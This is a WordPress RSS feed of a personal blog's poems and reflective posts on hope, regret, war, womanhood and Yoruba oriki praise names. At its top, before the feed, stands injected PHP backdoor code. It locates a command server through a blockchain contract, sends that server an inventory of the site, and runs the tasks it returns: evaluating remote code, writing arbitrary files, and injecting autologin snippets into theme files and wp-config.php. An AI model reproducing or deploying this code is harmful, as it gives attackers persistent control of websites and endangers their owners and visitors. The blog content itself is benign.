// 83_7q if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/var/www/wptbox/wp-content/plugins/hseo/hseo.php', 'ctrl'=>'// 83_7q', 'vis'=>'// ww_h3', 'vis_func'=>'wp_x4sw32', 'vis_paths'=>array('/var/www/wptbox/wp-content/plugins/hseo/hseo.php'), 'opt'=>'_wp_fuj2eisb', ); $keys=array(); $keys['id']='3gb'; $keys['ver']='o3'; $keys['caps']='szx'; $keys['tasks']='7ac'; $keys['interval']='24g'; $keys['ack_id']='cgg'; $keys['ok']='ds'; $keys['detail']='4wl'; $keys['inv']='htt'; $keys['result']='ldj'; $hdr='X-FCV-Auth';$tok='3cxDcD-bKzsxss28LdpJo-6Qf8jiY2x8o7A8t6vz2TE';$id='dbf0858afab4e217';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Poems – Tobioloyede https://tobioloyede.com Delving into daily life issues to foster change Sat, 12 Sep 2026 23:35:28 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 https://tobioloyede.com/wp-content/uploads/2022/12/cropped-Beige-Elegant-Personal-Business-Card-2-32x32.png Poems – Tobioloyede https://tobioloyede.com 32 32 To You https://tobioloyede.com/to-you/ https://tobioloyede.com/to-you/#respond Tue, 18 Jan 2022 06:06:05 +0000 https://tobioloyedesblog.wordpress.com/?p=486

Have you been in a situation where suddenly you realize that you were never what you thought you were? It could be in a romantic relationship, among friends, or just in a situation where you’re the plan B. You’re sought after only because the first option didn’t work out. Hear me, you can be the second option and be the best option, but if it makes you feel bad/less about yourself, then there is a problem. You are a priority, don’t forget that. You are valuable.



“Everyone has the ability to hurt. It’s the choice that matters.”
― Yvonne Woon, Dead Beautiful

 

 

]]>
https://tobioloyede.com/to-you/feed/ 0
A Silhouette of Regret https://tobioloyede.com/a-silhouette-of-regret/ https://tobioloyede.com/a-silhouette-of-regret/#respond Mon, 01 Feb 2021 05:21:52 +0000 https://tobioloyedesblog.wordpress.com/2021/02/01/a-silhouette-of-regret/
Part 1

Here’s a poem in two parts, written about 2 years ago.

It is funny how the so-called silhouette challenge reminded me of my then unfinished poem.

The Silhouette of Regret (Part 1 above) is a piece on the description of Akande’s past- mistakes and regrets. He lives with them even though he tries to play the denial game.

The Akande’s Peace (Part 2 below) is the hope he clinges on regarding his past. Despite his beliefs, he come to find something that is greater than his past.

Undoubtedly for some people, there are things in the past that remain untold. There are things or mistakes that still bite you till date and you could find that solace that’s above the experiences. Take your time to heal and give room for better days ahead. Be Intentional!!!

Happy New Month everyone

Part 2

]]>
https://tobioloyede.com/a-silhouette-of-regret/feed/ 0
Oríkì Sokí(Individual Praise Poetry) https://tobioloyede.com/oriki-sokiindividual-praise-poetry/ https://tobioloyede.com/oriki-sokiindividual-praise-poetry/#comments Wed, 19 Aug 2020 16:08:26 +0000 https://tobioloyedesblog.wordpress.com/?p=303

In the South-Western part (Yorubaland) of Nigeria, there are various types of names.
According to Oyeronke Ouewunmi, customarily, Yoruba names were not gender-specific and as such, males and females bore the same names. But now, names themselves are beginning to describe gender. Although there are different categories of Oríkì such as Oríkì Orile (family/lineage praise poetry), Oríkì ilu (town/community praise poetry), Oríkì of Dieties (which supply information on deities’ preferences, characteristics, taboos, and exploits) among others. Today we are focusing on Oríkì soki. Oríkì soki is gender-specific even though they do not align with the logic of the practices of naming in Yoruba. These are among the names that are given to an individual during the eight-day naming ceremony in most but not all parts of Yorubaland. These names are informed by a number of factors such as circumstances of birth, position of the child in the line of siblings, and the level of success/wealth of the family at the time of the child’s birth.

Map of Nigeria showing the Southwest region as the study area.

images.app.goo.gl/eiXDmrxq4Yq5vZsaA(opens in a new tab)

Oríkì is known as praise poetry or panegyric. The Oríkì soki is a kind of name used in a unique manner and always has its meaning visibly embedded in it. It is a kind of name that is used as an endearment or to placate an individual when hurt.
It is noteworthy that with the Yoruba culture is the Oríkì (praise poetry). Every tribe and every household has its own Oríkì soki just as each individual has his or her own Oríkì. Each name is given to individuals for symbolic reasons.

Enjoy the glossary of poetic names below (Here is a short version of the list of names available)

Female NamesMale Names
• Abeke –One that is begged to be care for or pampered.
• Akanke – One who is especially cherished or pampered.
• Àlàké – One that circumstances had to be overcome to take care of her.
• Ayinke – One meant to praise and pet.
• Àbèbí – One given birth to after a lot of persuasions (probably a difficult birth).
• Amope – One whose knowledge is complete.
• Àbèní – One we begged to have i.e. a child that was begged for to have or born (from God or, more often traditionally, the gods).
• Ànìké – One born to be pampered.
• Abegbe – A child that we begged to carry.
• Adubi – One we struggled to birth. Usually, given to a baby born via breech birth.
• Àshàké/Asake – One picked or selected to be pampered or cherished.
• Ajoke – One who is jointly cherished or jointly beloved or meaning meant to be taken care of by all.
• Adunni/Aduni – It could mean a joy to have or one we struggled to have.
• Asabi –It means one selected for birth.
• Apeke – One called or born to be cared for or pampered. The name is usually followed by soothing words and songs.
• Àdùké – One that people will fight over the privilege to care for her and pamper her.
• Ayoka –One who causes joy.
• Akanbi – It means one that is consciously or deliberately born.
• Alabi – It means one born to the white cloth (of Ọbàtálá).
• Ayinla – A child meant to be praised, feted, and disciplined.
• Àjàní – Yoruba Oriki name meaning a child we fought for to have. It is a name given to a son that is valued and cherished because of the victory fought and overcame to have him.
• Adisa – The literal meaning of this Oriki is one bundled up and spread to dry.
• Ajadi – The end of a conflict.
• Akanni – One that is special to have.
• Alani – One we survived to have.
• Ayinde – One who arrives when praised.
• Adigun – The perfectionist.
• Àkànde Àgàn – Yoruba Oriki name meaning favourite of the prince.
• Ajala – One who has fought and survived.
• Akande – One who purposefully came.
• Alade – One who survives to arrive.
• Àjàgbé – One we fought to carry.
• Akangbe – One consciously or deliberately carried.
• Akanmu – One who is personally chosen.
• Atanda – One created to shine brightness.
• Àkànní – Yoruba Oriki name meaning “met only once to have this child.” It is also a Yoruba Oriki given to a first male child.
• Àkànjí – One whose touch gives life.
• Ariyo – One with whom we rejoice at his sight

Your culture to an extent explains your identity.
Irrespective of your tribe, embrace your cultural heritage. Since culture is not static, strive to improve them.

Your words have meaning, your names carry power-Tobi Oloyede

The list is inexhaustible, feel free to add yours.

Source: Oyewumi, Oyeronke, “To Gender or Not to Gender: Making Sense of Oriki Soki in the Yoruba Naming System (April 12, 2013).” https://ssrn.com/abstract=2343229 Accessed March 21, 2020.

]]>
https://tobioloyede.com/oriki-sokiindividual-praise-poetry/feed/ 4
The Beauty of Nature https://tobioloyede.com/the-beauty-of-nature/ https://tobioloyede.com/the-beauty-of-nature/#respond Wed, 24 Jun 2020 23:56:20 +0000 https://tobioloyedesblog.wordpress.com/2020/06/24/the-beauty-of-nature/

The beauty of nature is so real that sometimes I pinch myself to understanding it. Its effects transcend our outer world to our inner-oh! What such awe it breeds.

Sometimes I ask myself ‘what is it that makes nature both powerful and beautiful?’ Ralph Waldo Emerson notes that ‘the simple perception of natural forms is a delight.’ When I think of the beauty entrenched in nature, I instantly think of the burgeoning of flowers, the rising of the sun, the high standing mountains, the luminance of the moon. . .

Interestingly, I do not appreciate these beauties because of their functionalities, but rather their modes of formation. Behold with me the beauty that calls out to us.

Nature is beautiful, beauty is value- Tobi Oloyede

]]>
https://tobioloyede.com/the-beauty-of-nature/feed/ 0
HOPE https://tobioloyede.com/hope/ https://tobioloyede.com/hope/#respond Sat, 04 Apr 2020 16:34:47 +0000 https://tobioloyedesblog.wordpress.com/?p=241

In yester days, and yester weeks

You never thought to agree with me

Neither did I you

But here comes a raging force

With the power for unity in diversity

Hope is it that unites us

Sprouting in our souls without permission

With no boundaries, it thrives

Even in the abysmal abyss, it blossoms

For what is to life,

Without hope

What is survival,

If we don’t refine our values.

For the yester years and yester months,

Is where we learn our mistakes and forge our front.

]]>
https://tobioloyede.com/hope/feed/ 0
I AM A WOMAN https://tobioloyede.com/i-am-a-woman/ https://tobioloyede.com/i-am-a-woman/#respond Sun, 08 Mar 2020 05:01:49 +0000 https://tobioloyedesblog.wordpress.com/?p=232

Several years back, I was dejected and I blamed myself for being a woman. I thought life was unfair to me, but with an introspection into my core, I realized that I am more than I think of myself. Yes that I can achieve whatever irrespective of the social constructions.

That you are a woman is never a reason to accept anything, instead, work on yourself and change the narrative.
Lo, I hear the sound of celebration around me
They say it is International women’s day
Yes, it is
It is not to say that I am celebrated once in 365 days, rather, it is a memorable day for the movement of women’s rights.
As we move towards creating an equal society, look beyond the issues of feminism and patriarchy and think about equality for all humanity. Celebrate achievements irrespective of gender or color.

The question isn’t who is going to let me; it’s who is going to stop me- Ayn Rand

]]>
https://tobioloyede.com/i-am-a-woman/feed/ 0
BROKEN https://tobioloyede.com/broken/ https://tobioloyede.com/broken/#respond Sun, 02 Feb 2020 04:26:01 +0000 https://tobioloyedesblog.wordpress.com/?p=195
I am neither better than a bird with a broken wing 
nor a snail with a broken shell
Damaged in all angles
I want to fly, I want to soar
Yet frustrated

Sometimes I feel free, 
other times I am trapped
I cannot fly, so I stand

I make excuses, I try to hide my emotions
I am tired of my situation yet I cannot let it out
I hide it like there’s nothing wrong
It is much more than you think

When this happens,
please sit with me
Listen to my silence

Help me sail smoothly
One step at a time, so I can learn again to fly.

NB: Sometimes, we think we know so much about an individual such that we take their unreasonable behaviors or reactions for granted. Until we dig deeper, only then will we better comprehend what they go through in their lonely cubicle.

So many people hide their pain behind the visible facade of smiles. Help them heal, take time to be that willing heart, listening ear and a helping hand.

]]>
https://tobioloyede.com/broken/feed/ 0
A HAMLET OF WAR https://tobioloyede.com/a-hamlet-of-war/ https://tobioloyede.com/a-hamlet-of-war/#respond Fri, 10 Jan 2020 13:47:27 +0000 https://tobioloyedesblog.wordpress.com/?p=173

Gazing all around

All I see is a cruel battle scene

With obnoxious smell of blood,
The stench grows stronger

Lost souls scattered round the lieu

No flies or vulture to feast when due

As I look around,

My heart drowns in despair

Hardly can I see

For my eyes are dazzled with fumes.

Can this war just end?

My eardrums ache from the pandemonium of gunfire

The thoughts and images of killings

Scare me to death

I seek an end to this battle

I try to keep hopes alive

This is nothing but a hamlet of death.

I have seen it all

I can no less regard others

I have been there

Now I am more prudent.

NOTE: War undoubtedly has with it, several destructive impacts. Over the years, research has it that the traumatic impacts of war allows for the manifestation of resilience. This does not go to say that war should be encouraged as its negative effects continues to supercede its positive effects.

“Peace cannot be achieved through violence, it can only be attained through understanding” -Ralph Waldo Emerson

]]>
https://tobioloyede.com/a-hamlet-of-war/feed/ 0
STRENGTH https://tobioloyede.com/strength/ https://tobioloyede.com/strength/#respond Mon, 21 Oct 2019 14:12:07 +0000 https://tobioloyedesblog.wordpress.com/?p=34

Instantly, my eyes were open
Of what use is it, I asked
To have you muddle my mind
To have you eke my rest
It is time I let go
I need my mind, I need my peace
Free from attachments, free from shackles
 
I forgive you even if you aren’t sorry                 -Strength

(Inspiration: They say I am Soft, I call it my Weakness, but then again, It is my unique Strength. The onus is on you to find possibility and positivity in that situation that seems awkward.)

]]>
https://tobioloyede.com/strength/feed/ 0